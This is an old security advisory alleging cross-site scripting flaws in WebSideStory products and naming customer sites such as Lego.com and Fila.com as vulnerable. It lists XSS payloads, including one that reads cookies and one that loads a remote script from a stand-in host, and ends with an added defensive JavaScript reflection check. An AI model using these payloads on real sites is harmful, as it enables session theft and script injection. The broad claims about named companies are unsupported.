HSC Research Group - Advisories
Written by Hackers Center
Saturday, 09 December 2006 08:52
###############################################################
---------------------------- [HSC] HackersCenter IT Security Research Team ---------------------------
###############################################################
WebSideStory offers a suite of digital marketing applications: web analytics, site search, web content management and keyword bid management.
Date Found: 12/03/2006
Vendor: www.websidestory.com
This is a critical find: all users of any WebSideStory products are at high risk of having cross-site scripting holes. Here is a list of a few of those users; we tested the sites and found all of them are vulnerable to XSS! Search engines and logins are also vulnerable, as are a few sites with shopping carts from WebSideStory. So if your site has this code on it, "<!--END WEBSIDESTORY CODE-->", you had better check your security!
www.websidestory.com/customers/overview.html
For example, all sites under Penton Media Inc. are vulnerable, including the Lego.com shopping cart, Fila.com and many more!
XSS Holes:
"><plaintext>
<script>alert("XSS");</script>
<script>alert(document.cookie);</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script src=http://www.Site.com/XSS.js></script>
>"<iframe src=http://www.Site.com width=815 height=505></script>
- Need Fix? Contact www.securityforge.com
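For site owners who find the marker above in their pages, the following is an added example (not part of the original advisory and not WebSideStory code) of a regression check: it echoes the advisory's test strings through a search-results template and reports which ones come back unencoded. The template, the parameter name q and all function names are hypothetical.

```javascript
// Added example. The page template below is constructed for illustration.
const MARKER = '<!--END WEBSIDESTORY CODE-->';

// Test strings copied from the advisory's "XSS Holes" list.
const PROBES = [
  '"><plaintext>',
  '<script>alert("XSS");</script>',
  '<script>alert(String.fromCharCode(88,83,83))</script>',
  '>"<iframe src=http://www.Site.com width=815 height=505></script>',
];

// Encode the characters that let input break out of HTML text
// or out of a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Weak form: the search term is echoed verbatim into an attribute and body text.
function renderUnsafe(q) {
  return `<form><input name="q" value="${q}"></form>\n<p>Results for ${q}</p>\n${MARKER}`;
}

// Hardened form: the same template with the term encoded before output.
function renderSafe(q) {
  const e = escapeHtml(q);
  return `<form><input name="q" value="${e}"></form>\n<p>Results for ${e}</p>\n${MARKER}`;
}

// Run every probe through a render function and collect those that
// appear unencoded in the generated HTML.
function auditPage(render) {
  return {
    hasMarker: render('test').includes(MARKER),
    reflected: PROBES.filter((p) => render(p).includes(p)),
  };
}

console.log('unsafe:', auditPage(renderUnsafe));
console.log('safe:  ', auditPage(renderSafe));
```

The check only detects verbatim reflection, and escapeHtml covers HTML text and quoted attributes; input written into script blocks or URLs needs encoding for that context instead.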